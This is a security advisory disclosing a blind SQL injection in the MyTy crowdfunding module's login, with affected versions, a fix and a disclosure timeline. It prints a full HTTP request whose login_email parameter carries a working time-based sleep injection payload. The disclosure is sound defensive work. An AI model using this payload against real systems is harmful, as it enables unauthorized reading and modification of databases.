############################################################# # # COMPASS SECURITY ADVISORY # https://www.compass-security.com/research/advisories/ # ############################################################# # # Product: MyTy # Vendor: Finlane GmbH # CSNC ID: CSNC-2017-029 # CVE ID: - # Subject: Blind SQL injection # Risk: High # Effect: Remotely exploitable # Author: Nicolas Heiniger <nicolas.heiniger@xxxxxxxxxxxxxxxxxxxx> # Date: 21.11.2017 # ############################################################# Introduction: ------------- MyTy[1] is a software framework that includes a crowdfunding module. It can be installed on a customer server and used to create whitelabel websites for crowdfunding platforms. Compass Security discovered a web application security flaw in the crowdfunding module login process that allows an unauthenticated attacker to execute arbitrary SQL query against the database. This allows to read and modify the whole database, within the privilege limitations of the database user executing the queries. Affected: --------- Vulnerable: * MyTy 5.0.4 to 5.1.6 Technical Description --------------------- During the login process, the user email and password are sent in a POST request. In this request, the login_email parameter is concatenated into an SQL query in a way that allows for SQL injection. This was first discovered as a time-based blind injection with the following request: =============== POST /tycon/modules/crowdfunding/mvc/controller/ajax/user/login/show.php?popin=1 &type=simpleLogin&activeTab=0 HTTP/1.1 Host: [CUT BY COMPASS] User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: [CUT BY COMPASS] Content-Length: 154 Cookie: tyFl=de_de; XSRF-TOKEN=oBwu%2BTWkisoYIpFEzoHDdSceUSflgjymh2uN1wXxZKg%3D; lang=de; PHPSESSID=e1e71aroeb557v412tov9fu574; tyBl=en_us; cfce=1; _ga=GA1.2.75537659.1504612703; _gid=GA1.2.1847726517.1504612703; cf_cookie_policy_read=1; _gat=1 CSNC-HEN: Pentest1-Blue Connection: close login=1&callback=&redirect=&fwd=%252Fprojekte%252Fsuchergebnisse.html%253F &login_type=inline&popin=1&type=simpleLogin &login_email=test'%2b(select*from(select(sleep(20)))a)%2b'&login_password=1234 =============== Workaround / Fix: ----------------- Install an up to date version of the MyTy software. As a developer: Strictly use prepared statements in order to protect the application from SQL injection. Optional addition: Validate all user input and filter dangerous characters, which can cause a change of the context and have to be filtered, cut or escaped e.g. " ' -- () ; Timeline: --------- 2017-11-21: Coordinated public disclosure date 2017-09-06: Release of fix in versions 5.0.12 and 5.1.7 2017-09-06: Initial vendor response 2017-09-06: Initial vendor notification 2017-09-06: Discovery by Nicolas Heiniger References: ----------- [1] https://www.finlane.com/loesungen/whitelabel-pages/ [2] https://github.com/sqlmapproject/sqlmap